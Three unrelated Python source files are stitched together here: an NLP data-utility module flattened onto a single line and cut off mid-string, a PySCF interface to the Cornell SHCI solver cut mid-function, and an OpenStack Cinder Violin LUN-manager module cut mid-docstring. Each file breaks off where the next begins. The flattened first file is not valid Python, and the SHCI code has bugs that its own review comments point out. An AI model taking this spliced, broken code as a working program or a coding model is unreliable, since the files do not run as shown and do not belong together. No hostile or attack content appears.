import json from json.decoder import JSONDecodeError import logging import os import shutil import random import time import re import numpy as np import torch from .data_utils.example import Batch from .data_utils.iterator import Iterator logger = logging.getLogger(__name__) ENTITY_MATCH_REGEX = re.compile('^([A-Z].*)_[0-9]+$') class SpecialTokenMap: def __init__(self, pattern, forward_func, backward_func=None): """ Inputs: pattern: a regex pattern forward_func: a function with signature forward_func(str) -> str backward_func: a function with signature backward_func(str) -> list[str] """ if isinstance(forward_func, list): self.forward_func = lambda x: forward_func[int(x)%len(forward_func)] else: self.forward_func = forward_func if isinstance(backward_func, list): self.backward_func = lambda x: backward_func[int(x)%len(backward_func)] else: self.backward_func = backward_func self.pattern = pattern def forward(self, s: str): reverse_map = [] matches = re.finditer(self.pattern, s) if matches is None: return s, reverse_map for match in matches: occurrence = match.group(0) parameter = match.group(1) replacement = self.forward_func(parameter) s = s.replace(occurrence, replacement) reverse_map.append((self, occurrence)) return s, reverse_map def backward(self, s: str, occurrence: str): match = re.match(self.pattern, occurrence) parameter = match.group(1) if self.backward_func is None: list_of_strings_to_match = [self.forward_func(parameter)] else: list_of_strings_to_match = sorted(self.backward_func(parameter), key=lambda x:len(x), reverse=True) for string_to_match in list_of_strings_to_match: l = [' '+string_to_match+' ', string_to_match+' ', ' '+string_to_match] o = [' '+occurrence+' ', occurrence+' ', ' '+occurrence] new_s = s for i in range(len(l)): new_s = re.sub(l[i], o[i], s, flags=re.IGNORECASE) if s != new_s: break if s != new_s: s = new_s break return s def find_span_type(program, begin_index, end_index): if begin_index > 1 and program[begin_index - 2] == 
'location:': span_type = 'LOCATION' elif end_index == len(program) - 1 or not program[end_index + 1].startswith('^^'): span_type = 'QUOTED_STRING' else: if program[end_index + 1] == '^^tt:hashtag': span_type = 'HASHTAG' elif program[end_index + 1] == '^^tt:username': span_type = 'USERNAME' else: span_type = 'GENERIC_ENTITY_' + program[end_index + 1][2:] end_index += 1 return span_type, end_index def requote_program(program): program = program.split(' ') requoted = [] in_string = False begin_index = 0 i = 0 while i < len(program): token = program[i] if token == '"': in_string = not in_string if in_string: begin_index = i + 1 else: span_type, end_index = find_span_type(program, begin_index, i) requoted.append(span_type) i = end_index elif not in_string: entity_match = ENTITY_MATCH_REGEX.match(token) if entity_match is not None: requoted.append(entity_match[1]) elif token != 'location:': requoted.append(token) i += 1 return ' '.join(requoted) def tokenizer(s): return s.split() def mask_special_tokens(string: str): exceptions = [match.group(0) for match in re.finditer('[A-Za-z:_.]+_[0-9]+', string)] for e in exceptions: string = string.replace(e, '<temp>', 1) return string, exceptions def unmask_special_tokens(string: str, exceptions: list): for e in exceptions: string = string.replace('<temp>', e, 1) return string def detokenize(string: str): string, exceptions = mask_special_tokens(string) tokens = ["'d", "n't", "'ve", "'m", "'re", "'ll", ".", ",", "?", "!", "'s", ")", ":"] for t in tokens: string = string.replace(' ' + t, t) string = string.replace("( ", "(") string = string.replace('gon na', 'gonna') string = string.replace('wan na', 'wanna') string = unmask_special_tokens(string, exceptions) return string def tokenize(string: str): string, exceptions = mask_special_tokens(string) tokens = ["'d", "n't", "'ve", "'m", "'re", "'ll", ".", ",", "?", "!", "'s", ")", ":"] for t in tokens: string = string.replace(t, ' ' + t) string = string.replace("(", "( ") string = 
string.replace('gonna', 'gon na') string = string.replace('wanna', 'wan na') string = re.sub('\s+', ' ', string) string = unmask_special_tokens(string, exceptions) return string.strip() def lower_case(string): string, exceptions = mask_special_tokens(string) string = string.lower() string = unmask_special_tokens(string, exceptions) return string def get_number_of_lines(file_path): count = 0 with open(file_path) as f: for line in f: count += 1 return count def get_part_path(path, part_idx): if path.endswith(os.path.sep): has_separator = True path = path[:-1] else: has_separator = False return path + '_part' + str(part_idx+1) + (os.path.sep if has_separator else '') def split_folder_on_disk(folder_path, num_splits): new_folder_paths = [get_part_path(folder_path, part_idx) for part_idx in range(num_splits)] for subdir, dirs, files in os.walk(folder_path): for file in files: new_file_paths = [os.path.join(subdir.replace(folder_path, new_folder_paths[part_idx]), file) for part_idx in range(num_splits)] split_file_on_disk(os.path.join(subdir, file), num_splits, output_paths=new_file_paths) return new_folder_paths def split_file_on_disk(file_path, num_splits, output_paths=None): """ """ number_of_lines = get_number_of_lines(file_path) all_output_paths = [] all_output_files = [] for part_idx in range(num_splits): if output_paths is None: output_path = get_part_path(file_path, part_idx) else: output_path = output_paths[part_idx] all_output_paths.append(output_path) os.makedirs(os.path.dirname(output_path), exist_ok=True) all_output_files.append(open(output_path, 'w')) with open(file_path, 'r') as input_file: output_file_idx = 0 for line in input_file: all_output_files[output_file_idx].write(line) output_file_idx = (output_file_idx + 1) % len(all_output_files) for f in all_output_files: f.close() return all_output_paths def combine_folders_on_disk(folder_path_prefix, num_files, line_group_size, delete=False): folder_paths = [get_part_path(folder_path_prefix, part_idx) for 
part_idx in range(num_files)] new_to_olds_map = {} for i in range(num_files): for subdir, dirs, files in os.walk(folder_paths[i]): for file in files: new_file_path = os.path.join(subdir.replace(folder_paths[i], folder_path_prefix), file) if new_file_path not in new_to_olds_map: new_to_olds_map[new_file_path] = [] new_to_olds_map[new_file_path].append(os.path.join(subdir, file)) for new, olds in new_to_olds_map.items(): os.makedirs(os.path.dirname(new), exist_ok=True) with open(new, 'w') as combined_file: if new.endswith('.json'): new_json = None for old in olds: with open(old, 'r') as f: if new_json is None: try: new_json = json.load(f) except JSONDecodeError: f.seek(0) logger.info('Failed to read json file %s with content:\n %s', old, f.read()) else: for k, v in json.load(f).items(): new_json[k] += v for k, v in new_json.items(): new_json[k] /= float(num_files) json.dump(new_json, combined_file) else: all_old_file_contents = [] for old in olds: with open(old, 'r') as f: all_old_file_contents.append([line for line in f]) old_file_idx = 0 all_indices = [0] * len(all_old_file_contents) finished_reading = [False] * len(all_old_file_contents) while True: if finished_reading[old_file_idx]: old_file_idx = (old_file_idx + 1) % len(all_old_file_contents) continue for i in range(line_group_size): line = all_old_file_contents[old_file_idx][all_indices[old_file_idx]] combined_file.write(line) all_indices[old_file_idx] += 1 if all_indices[old_file_idx] == len(all_old_file_contents[old_file_idx]): finished_reading[old_file_idx] = True if all(finished_reading): break old_file_idx = (old_file_idx + 1) % len(all_old_file_contents) if delete: for folder in folder_paths: shutil.rmtree(folder) def combine_files_on_disk(file_path_prefix, num_files, line_group_size, delete=False): all_input_file_contents = [] all_input_file_paths = [] for i in range(num_files): input_file_path = get_part_path(file_path_prefix, i) all_input_file_paths.append(input_file_path) with open(input_file_path, 
'r') as f: all_input_file_contents.append([line for line in f]) all_indices = [0] * len(all_input_file_contents) finished_reading = [False] * len(all_input_file_contents) input_file_idx = 0 with open(file_path_prefix, 'w') as combined_file: while True: if finished_reading[input_file_idx]: input_file_idx = (input_file_idx + 1) % len(all_input_file_contents) continue for i in range(line_group_size): line = all_input_file_contents[input_file_idx][all_indices[input_file_idx]] combined_file.write(line) all_indices[input_file_idx] += 1 if all_indices[input_file_idx] == len(all_input_file_contents[input_file_idx]): finished_reading[input_file_idx] = True if all(finished_reading): break input_file_idx = (input_file_idx + 1) % len(all_input_file_contents) if delete: for file_path in all_input_file_paths: os.remove(file_path) def map_filter(callable, iterable): output = [] for element in iterable: new_element = callable(element) if new_element is not None: output.append(new_element) return output def preprocess_examples(args, tasks, splits, logger=None, train=True): min_length = 1 max_context_length = args.max_train_context_length if train else args.max_val_context_length is_too_long = lambda ex: (len(ex.answer) > args.max_answer_length or len(ex.context) > max_context_length) is_too_short = lambda ex: (len(ex.answer) < min_length or len(ex.context) < min_length) for task, s in zip(tasks, splits): if logger is not None: logger.info(f'{task.name} has {len(s.examples)} examples') l = len(s.examples) s.examples = map_filter( lambda ex: task.preprocess_example(ex, train=train, max_context_length=max_context_length), s.examples) if train: l = len(s.examples) s.examples = [ex for ex in s.examples if not is_too_long(ex)] if len(s.examples) < l: if logger is not None: logger.info(f'Filtering out
<gh_stars>1-10
#!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME>
#         <NAME>
#

'''
SHCI solver for CASCI and CASSCF.

Cornell SHCI program Arrow is developed by <NAME>, <NAME>.
You'll need to contact <NAME> to get the program.
'''

import os
import sys
import json
import time
import tempfile
import copy
import glob
import shutil
from subprocess import check_call, check_output, CalledProcessError
import numpy
from pyscf.lib import logger
from pyscf import lib
from pyscf import tools
from pyscf import ao2mo
from pyscf import mcscf
from pyscf.cornell_shci import symmetry

# Settings: prefer a user-supplied settings.py; otherwise fall back to
# values stored in the pyscf global config.
try:
    from pyscf.cornell_shci import settings
except ImportError:
    from pyscf import __config__
    settings = lambda: None
    settings.SHCIEXE = getattr(__config__, 'shci_SHCIEXE', None)
    settings.SHCIRUNTIMEDIR = getattr(__config__, 'shci_SHCIRUNTIMEDIR', None)
    settings.MPIPREFIX = getattr(__config__, 'shci_MPIPREFIX', None)
    if settings.SHCIEXE is None:
        import sys
        sys.stderr.write('settings.py not found. Please create %s\n'
                         % os.path.join(os.path.dirname(__file__), 'settings.py'))
        raise ImportError('settings.py not found')

# Optional client for driving a running SHCI server process; only used by
# SHCI.contract_2e below.
try:
    sys.path.append(os.path.dirname(settings.SHCIEXE))
    from hc_client import HcClient
except:
    pass

# The default parameters in config file
CONFIG = {
    'system': 'chem',
    # Define the number of electrons and spin
    'n_up': 0,
    'n_dn': 0,
    'eps_vars': [
        5e-5,
        # 2e-5,
        # 1e-5
    ],
    'eps_vars_schedule': [
        2e-3,
        1e-3,
        5e-4,
        2e-4,
        1e-4
    ],
    'chem': {
        # d2h and its subgroups, and Dooh
        'point_group': 'C1'
    },
    ## Error tol of PT energy. The variational energy error tol equals
    ## target_error/5000
    # 'target_error': 1e-5,
    #
    ## Whether to compute density matrices
    # 'get_1rdm_csv': False,
    # 'get_2rdm_csv': False,
    #
    ## Variational calculation only, without perturbation correction
    # 'var_only' : False,
    #
    ## Set it for Green's function G+
    # 'get_green' : False,
    # 'w_green' : -0.40,  # frequency
    # 'n_green' : 0.01,  # imaginary part to avoid divergence
    ## set it for G-
    # 'adavanced' : False,
}


def cleanup(shciobj, remove_wf=False):
    # Remove intermediate files left in shciobj.runtimedir by an SHCI run.
    # With remove_wf=True the stored wave-function files (wf_*) are removed
    # as well, forcing the next run to start from scratch.
    files = ['1rdm.csv', '2rdm.csv',
             shciobj.configfile,
             shciobj.integralfile,
             shciobj.outputfile,
             'integrals_cache.dat',
             'result.json',
             ]
    if remove_wf:
        wfn_files = glob.glob(os.path.join(shciobj.runtimedir, 'wf_*'))
        files.extend(wfn_files)
    for f in files:
        if os.path.isfile(os.path.join(shciobj.runtimedir, f)):
            os.remove(os.path.join(shciobj.runtimedir, f))


class SHCI(lib.StreamObject):
    r'''SHCI program interface and object to hold SHCI program input parameters.

    See also the homepage of the SHCI program.
    https://github.com/jl2922/shci

    Attributes:

    Examples:

    '''
    def __init__(self, mol=None, tol=None):
        self.mol = mol
        if mol is None:
            self.stdout = sys.stdout
            self.verbose = logger.NOTE
        else:
            self.stdout = mol.stdout
            self.verbose = mol.verbose
        self.executable = settings.SHCIEXE
        self.mpiprefix = settings.MPIPREFIX
        self.runtimedir = '.'#getattr(settings, 'SHCIRUNTIMEDIR', '.')
        self.configfile = 'config.json'  # DO NOT modify
        self.integralfile = 'FCIDUMP'  # DO NOT modify
        self.outputfile = 'output.dat'
        self.nroots = 1
        self.conv_tol = tol
        self.config = copy.deepcopy(CONFIG)
        # TODO: Organize into pyscf and SHCI parameters
        self.restart = False
        self.spin = None
        if mol is not None and mol.symmetry:
            self.groupname = mol.groupname
        else:
            self.groupname = None
        self.dryrun = False
##################################################
#DO NOT CHANGE these parameters, unless you know the code in details
        self.orbsym = []
        self._keys = set(self.__dict__.keys())

    def dump_flags(self, verbose=None):
        # Log the solver configuration at the current verbosity level.
        log = logger.new_logger(self, verbose)
        log.info('')
        log.info('******** SHCI flags ********')
        log.info('executable = %s', self.executable)
        log.info('mpiprefix = %s', self.mpiprefix)
        log.info('runtimedir = %s', self.runtimedir)
        log.debug1('config = %s', self.config)
        log.info('')
        return self

    def make_rdm1(self, state, norb, nelec, **kwargs):
        # Build the spin-traced 1-particle density matrix from the CSV file
        # dumped by the SHCI program, re-running SHCI if the file (or the
        # wave function it belongs to) is not present.
        dm_file = os.path.join(self.runtimedir, '1rdm.csv')
        if not ('get_1rdm_csv' in self.config and os.path.isfile(dm_file) and
                os.path.isfile(get_wfn_file(self, state))):
            write_config(self, nelec, {'get_1rdm_csv': True,
                                       'load_integrals_cache': True})
            execute_shci(self)
        i, j, val = numpy.loadtxt(dm_file, dtype=numpy.dtype('i,i,d'),
                                  delimiter=',', skiprows=1, unpack=True)
        rdm1 = numpy.zeros((norb,norb))
        # Only one triangle is dumped; symmetrize on assignment.
        rdm1[i,j] = rdm1[j,i] = val
        return rdm1

    def make_rdm1s(self, state, norb, nelec, **kwargs):
        # Ref: IJQC, 109, 3552 Eq (3)
        if isinstance(nelec, (int, numpy.integer)):
            nelecb = (nelec-self.spin) // 2
            neleca = nelec - nelecb
        else :
            neleca, nelecb = nelec
        dm1, dm2 = self.make_rdm12(state, norb, nelec, **kwargs)
        dm1n = (2-(neleca+nelecb)/2.) * dm1 - numpy.einsum('pkkq->pq', dm2)
        dm1n *= 1./(neleca-nelecb+1)
        dm1a, dm1b = (dm1+dm1n)*.5, (dm1-dm1n)*.5
        return dm1a, dm1b

    def make_rdm12(self, state, norb, nelec, **kwargs):
        # Build (rdm1, rdm2) from the 2rdm.csv dumped by SHCI, re-running
        # SHCI when needed; rdm1 is derived by partial trace of rdm2.
        dm_file = os.path.join(self.runtimedir, '2rdm.csv')
        if not ('get_2rdm_csv' in self.config and os.path.isfile(dm_file) and
                os.path.isfile(get_wfn_file(self, state))):
            write_config(self, nelec, {'get_2rdm_csv': True,
                                       'load_integrals_cache': True})
            execute_shci(self)

        # two_rdm is dumped as
        #    for (unsigned p = 0; p < n_orbs; p++)
        #      for (unsigned q = p; q < n_orbs; q++)
        #        for (unsigned s = 0; s < n_orbs; s++)
        #          for (unsigned r = 0; r < n_orbs; r++) {
        #            if (p == q && s > r) continue;
        #            const double rdm_pqrs = two_rdm[combine4_2rdm(p, q, r, s, n_orbs)];
        #            if (std::abs(rdm_pqrs) < 1.0e-9) continue;
        #            fprintf(pFile, "%d,%d,%d,%d,%#.15g\n", p, q, r, s, rdm_pqrs); }
        i, j, k, l, val = numpy.loadtxt(dm_file, dtype=numpy.dtype('i,i,i,i,d'),
                                        delimiter=',', skiprows=1, unpack=True)
        rdm2 = numpy.zeros((norb,norb,norb,norb))
        rdm2[i,j,k,l] = rdm2[j,i,l,k] = val
        # convert rdm2 to the pyscf convention
        rdm2 = rdm2.transpose(0,3,1,2)

        if isinstance(nelec, (int, numpy.integer)):
            nelectrons = nelec
        else:
            nelectrons = nelec[0] + nelec[1]
        rdm1 = numpy.einsum('ikjj->ki', rdm2) / (nelectrons - 1)
        return rdm1, rdm2

    def kernel(self, h1e, eri, norb, nelec, ci0=None, ecore=0, restart=None,
               **kwargs):
        # Run a full SHCI calculation: write FCIDUMP + config, execute the
        # external program, and return (energy, state-id).
        if restart is None:
            restart = self.restart
        state_id = min(self.config['eps_vars'])
        if restart or ci0 is not None:
            if self.verbose >= logger.DEBUG1:
                logger.debug1(self, 'restart was set. wf is read from wf_eps* file.')
            self.cleanup(remove_wf=False)
            wfn_file = get_wfn_file(self, state_id)
            # NOTE(review): the wf file is renamed to the name for
            # eps_var*2 — presumably so the solver restarts from it as a
            # looser-threshold seed; confirm against the Arrow docs.
            if os.path.isfile(wfn_file):
                shutil.move(wfn_file, get_wfn_file(self, state_id * 2))
        else:
            self.cleanup(remove_wf=True)

        if 'orbsym' in kwargs:
            self.orbsym = kwargs['orbsym']
        writeIntegralFile(self, h1e, eri, norb, nelec, ecore)

        conf = {}
        if 'tol' in kwargs:
            conf['tol'] = kwargs['tol']
        write_config(self, nelec, conf)

        if self.dryrun:
            # Only write the input files; do not launch the SHCI program.
            logger.info(self, 'Only write integrals and config')
            if self.nroots == 1:
                calc_e = 0.0
                roots = ''
            else :
                calc_e = [0.0] * self.nroots
                roots = [''] * self.nroots
            return calc_e, roots

        if self.nroots != 1:
            raise NotImplementedError

        execute_shci(self)
        if self.verbose >= logger.DEBUG1:
            with open(os.path.join(self.runtimedir, self.outputfile), 'r') as f:
                self.stdout.write(f.read())

        calc_e = read_energy(self)

        # Each eps_vars is associated to one approximate wfn.  The smallest
        # eps_var is used as the "CI vector" handle returned to callers.
        roots = state_id = min(self.config['eps_vars'])
        if not os.path.isfile(get_wfn_file(self, state_id)):
            raise RuntimeError('Eigenstate %s not found' % get_wfn_file(self, state_id))
        return calc_e, roots

    def approx_kernel(self, h1e, eri, norb, nelec, ci0=None, ecore=0,
                      restart=None, **kwargs):
        # Looser-tolerance variant of kernel() used during CASSCF macro
        # iterations; same outputs as kernel().
        if restart is None:
            restart = self.restart
        state_id = min(self.config['eps_vars'])
        if restart or ci0 is not None:
            self.cleanup(remove_wf=False)
            wfn_file = get_wfn_file(self, state_id)
            if os.path.isfile(wfn_file):
                shutil.move(wfn_file, get_wfn_file(self, state_id * 2))
        else:
            self.cleanup(remove_wf=True)

        if 'orbsym' in kwargs:
            self.orbsym = kwargs['orbsym']
        writeIntegralFile(self, h1e, eri, norb, nelec, ecore)

        # approx_kernel is called by CASSCF solver only. 2pdm is always needed.
        conf = {'get_2rdm_csv': True}
        if 'tol' in kwargs:
            conf['tol'] = kwargs['tol']
        else:
            conf['tol'] = self.conv_tol * 1e3
        write_config(self, nelec, conf)

        execute_shci(self)
        if self.verbose >= logger.DEBUG1:
            with open(os.path.join(self.runtimedir, self.outputfile), 'r') as f:
                self.stdout.write(f.read())

        calc_e = read_energy(self)
        # Each eps_vars is associated to one approximate wfn.
        roots = state_id = min(self.config['eps_vars'])
        if not os.path.isfile(get_wfn_file(self, state_id)):
            raise RuntimeError('Eigenstate %s not found' % get_wfn_file(self, state_id))
        return calc_e, roots

    def spin_square(self, civec, norb, nelec):
        # Return (<S^2>, multiplicity) for the state identified by civec
        # (the eps_var handle returned by kernel()).
        state_id = civec
        if not ('s2' in self.config and
                os.path.isfile(get_wfn_file(self, state_id))):
            write_config(self, nelec, {'s2': True, 'load_integrals_cache': True})
            execute_shci(self)
        result = get_result(self)
        ss = result['s2']
        s = numpy.sqrt(ss+.25) - .5
        return ss, s*2+1

    def contract_2e(self, eri, civec, norb, nelec, client=None, **kwargs):
        # Apply the Hamiltonian to civec via a running SHCI server process.
        # NOTE(review): this branch looks inverted — `if getattr(self,
        # '_client', None):` creates a NEW HcClient precisely when one
        # already exists, and `client.startServer()` is called while
        # `client` is still None (should presumably be
        # `self._client.startServer()`).  Likewise the else-branch stores
        # None into self._client.  Verify against hc_client usage before
        # relying on this path.
        if client is None:
            if getattr(self, '_client', None):
                if not (os.path.isfile(os.path.join(self.runtimedir, self.integralfile)) and
                        os.path.isfile(os.path.join(self.runtimedir, self.configfile))):
                    raise RuntimeError('FCIDUMP or config.json not found')
                self._client = HcClient(nProcs=1, shciPath=self.executable,
                                        runtimePath=self.runtimedir)
                client.startServer()
                client = self._client
            else:
                self._client = client
        return client.Hc(civec)

    cleanup = cleanup


def write_config(shciobj, nelec, config):
    # Merge the per-call `config` overrides into a copy of shciobj.config,
    # fill in electron counts / point group / target_error, and dump the
    # result to the JSON config file read by the SHCI program.
    conf = shciobj.config.copy()
    if isinstance(nelec, (int, numpy.integer)):
        if shciobj.spin is None:
            nelecb = nelec // 2
        else:
            nelecb = (nelec - shciobj.spin) // 2
        neleca = nelec - nelecb
    else :
        neleca, nelecb = nelec
    conf['n_up'] = neleca
    conf['n_dn'] = nelecb

    if shciobj.groupname is not None:
        conf['chem']['point_group'] = shciobj.groupname

    # The SHCI variational error tolerance equals target_error/5000
    # (see the commented notes on CONFIG above).
    if shciobj.conv_tol is not None:
        conf['target_error'] = shciobj.conv_tol * 5000
    conf.update(config)
    if config.get('tol', None) is not None:
        conf['target_error'] = config['tol'] * 5000

    with open(os.path.join(shciobj.runtimedir, shciobj.configfile), 'w') as f:
        json.dump(conf, f, indent=2)


def writeIntegralFile(shciobj, h1eff, eri_cas, ncas, nelec, ecore=0):
    # Write the FCIDUMP integral file consumed by the SHCI program.
    if isinstance(nelec, (int, numpy.integer)):
        if shciobj.spin is None:
            nelecb = nelec // 2
        else:
            nelecb = (nelec - shciobj.spin) // 2
        neleca = nelec - nelecb
    else :
        neleca, nelecb = nelec

    # NOTE(review): `shciobj.orbsym is not []` is an identity comparison
    # and is always True; the intent is almost certainly
    # `len(shciobj.orbsym) > 0` — confirm before changing.
    if shciobj.groupname is not None and shciobj.orbsym is not []:
        # First removing the symmetry
<filename>cinder/volume/drivers/violin/vxg/vshare/lun.py
#!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright 2013 Violin Memory, Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

from cinder.volume.drivers.violin.vxg.core.node import XGNode
from cinder.volume.drivers.violin.vxg.core.error import *

"""
Here's an example of how to extend the functionality in this module:

class LUNManager_3(LUNManager_2):
    def __init__(self, basic):
        super(LUNManager_3, self).__init__(basic)

    def new_function(self, *args):
        pass
"""


class LUNManager(object):
    # Base LUN manager: every public method builds a list of XGNode
    # request nodes and posts them via the shared `basic` session object.
    def __init__(self, basic):
        self._basic = basic

    def create_lun(self, container, name, size, quantity, nozero,
                   thin, readonly, startnum, blksize=None):
        """Create a LUN.

        Arguments:
            container -- string
            name      -- string
            size      -- string
            quantity  -- uint64
            nozero    -- string
            thin      -- string
            readonly  -- string
            startnum  -- uint64
            blksize   -- uint32 (optional)

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        nodes.append(XGNode('size', 'string', size))
        nodes.append(XGNode('quantity', 'uint64', quantity))
        nodes.append(XGNode('nozero', 'string', nozero))
        nodes.append(XGNode('thin', 'string', thin))
        nodes.append(XGNode('readonly', 'string', readonly))
        # 'c' selects the create action on the appliance side.
        nodes.append(XGNode('action', 'string', 'c'))
        nodes.append(XGNode('startnum', 'uint64', startnum))
        if blksize is not None:
            nodes.append(XGNode('blksize', 'uint32', blksize))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/create', nodes)

    def bulk_delete_luns(self, container, luns):
        """Delete one or more LUNs.

        Arguments:
            container -- string
            luns      -- string (string or list)

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.extend(XGNode.as_node_list('lun/{0}', 'string', luns))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/bulk_delete', nodes)

    def export_lun(self, container, name, ports, initiators, lun_id):
        """Export a LUN.

        Arguments:
            container  -- string
            name       -- string
            ports      -- string
            initiators -- string
            lun_id     -- int16

        Returns:
            Action result as a dict.

        """
        return self._lun_export(container, name, ports,
                                initiators, lun_id, False)

    def unexport_lun(self, container, name, ports, initiators, lun_id):
        """Unexport a LUN.

        Arguments:
            container  -- string
            name       -- string
            ports      -- string
            initiators -- string
            lun_id     -- int16

        Returns:
            Action result as a dict.

        """
        return self._lun_export(container, name, ports,
                                initiators, lun_id, True)

    # Begin internal functions

    def _lun_export(self, container, name, ports, initiators,
                    lun_id, unexport):
        """Internal work function for:

            export_lun
            unexport_lun

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        nodes.append(XGNode('initiators', 'string', initiators))
        nodes.append(XGNode('ports', 'string', ports))
        # 'auto' maps to -1, which asks the appliance to pick the LUN id.
        if lun_id == 'auto':
            nodes.append(XGNode('lun_id', 'int16', -1))
        else:
            nodes.append(XGNode('lun_id', 'int16', lun_id))
        nodes.append(XGNode('unexport', 'bool', unexport))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/export', nodes)


class LUNManager_1(LUNManager):
    # Version 1: export/unexport accept lists of names/ports/initiators.
    def __init__(self, basic):
        super(LUNManager_1, self).__init__(basic)

    def export_lun(self, container, names, ports, initiators, lun_id):
        """Export a LUN.

        Arguments:
            container  -- string
            names      -- string (string or list)
            ports      -- string (string or list)
            initiators -- string (string or list)
            lun_id     -- int16

        Returns:
            Action result as a dict.

        """
        return self._lun_export(container, names, ports,
                                initiators, lun_id, False)

    def unexport_lun(self, container, names, ports, initiators, lun_id):
        """Unexport a LUN.

        Arguments:
            container  -- string
            names      -- string (string or list)
            ports      -- string (string or list)
            initiators -- string (string or list)
            lun_id     -- int16

        Returns:
            Action result as a dict.

        """
        return self._lun_export(container, names, ports,
                                initiators, lun_id, True)

    # Begin internal functions

    def _lun_export(self, container, names, ports, initiators,
                    lun_id, unexport):
        """Internal work function for:

            export_lun
            unexport_lun

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.extend(XGNode.as_node_list('names/{0}', 'string', names))
        nodes.extend(XGNode.as_node_list('initiators/{0}', 'string',
                                         initiators))
        nodes.extend(XGNode.as_node_list('ports/{0}', 'string', ports))
        if lun_id == 'auto':
            nodes.append(XGNode('lun_id', 'int16', -1))
        else:
            nodes.append(XGNode('lun_id', 'int16', lun_id))
        nodes.append(XGNode('unexport', 'bool', unexport))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/export', nodes)


class LUNManager_2(LUNManager_1):
    # Version 2: adds LUN modification (set) and rename.
    def __init__(self, basic):
        super(LUNManager_2, self).__init__(basic)

    def set(self, container, lun, read_only, port_A, port_B):
        """Perform LUN modification.

        Arguments:
            container -- string
            lun       -- string
            read_only -- bool
            port_A    -- bool
            port_B    -- bool

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('lun', 'string', lun))
        nodes.append(XGNode('read_only', 'bool', read_only))
        nodes.append(XGNode('port_A', 'bool', port_A))
        nodes.append(XGNode('port_B', 'bool', port_B))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/set', nodes)

    def rename_lun(self, container, lun_old, lun_new):
        """Rename a LUN.

        Arguments:
            container -- string
            lun_old   -- string
            lun_new   -- string

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('lun_old', 'string', lun_old))
        nodes.append(XGNode('lun_new', 'string', lun_new))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/rename', nodes)


class LUNManager_3(LUNManager_2):
    # Version 3: adds LUN groups, resize, and extended create/set options.
    def __init__(self, basic):
        super(LUNManager_3, self).__init__(basic)

    def create_lun_group(self, container, name, lun_names, description=None):
        """Create a LUN group.

        Arguments:
            container   -- string
            name        -- string
            lun_names   -- string (string or list)
            description -- string (optional)

        Returns:
            Action result as a dict.

        """
        return self._lungroup_create(container, name, lun_names,
                                     'create', description)

    def delete_lun_group(self, container, name):
        """Deletes a LUN group.

        Arguments:
            container -- string
            name      -- string

        Returns:
            Action result as a dict.

        """
        return self._lungroup_create(container, name, None, 'delete', None)

    def _lungroup_create(self, container, name, lun_names, action,
                         description):
        """Internal work function for:

            create_lun_group
            delete_lun_group

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        nodes.extend(XGNode.as_node_list('lun_names/{0}', 'string',
                                         lun_names))
        nodes.append(XGNode('action', 'string', action))
        if description is not None:
            nodes.append(XGNode('description', 'string', description))

        return self._basic.perform_action('/vshare/actions/vdm' +
                                          '/lungroup/create', nodes)

    def add_to_lun_group(self, container, name, lun_names=None,
                         new_name=None, description=None):
        """Update a LUN group and add LUNs.

        Arguments:
            container   -- string
            name        -- string
            lun_names   -- string (string or list, optional)
            new_name    -- string (optional)
            description -- string (optional)

        Returns:
            Action result as a dict.

        """
        return self._lungroup_update(container, name, new_name,
                                     lun_names, False, description)

    def remove_from_lun_group(self, container, name, lun_names=None,
                              new_name=None, description=None):
        """Update a LUN group and remove LUNs.

        Arguments:
            container   -- string
            name        -- string
            lun_names   -- string (string or list, optional)
            new_name    -- string (optional)
            description -- string

        Returns:
            Action result as a dict.

        """
        return self._lungroup_update(container, name, new_name,
                                     lun_names, True, description)

    def _lungroup_update(self, container, name, new_name, lun_names,
                         remove, description):
        """Internal work function for:

            add_to_lun_group
            remove_from_lun_group

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        if new_name is not None:
            nodes.append(XGNode('new_name', 'string', new_name))
        nodes.extend(XGNode.as_node_list('lun_names/{0}', 'string',
                                         lun_names))
        # NOTE(review): both callers pass a bool, so `remove is not None`
        # is always True here; harmless, but the guard is dead.
        if remove is not None:
            nodes.append(XGNode('remove', 'bool', remove))
        if description is not None:
            nodes.append(XGNode('description', 'string', description))

        return self._basic.perform_action('/vshare/actions/vdm' +
                                          '/lungroup/update', nodes)

    def export_lun_group(self, container, name, initiators, ports):
        """Exports a LUN group.

        Arguments:
            container  -- string
            name       -- string
            initiators -- string (string or list)
            ports      -- string (string or list)

        Returns:
            Action result as a dict.

        """
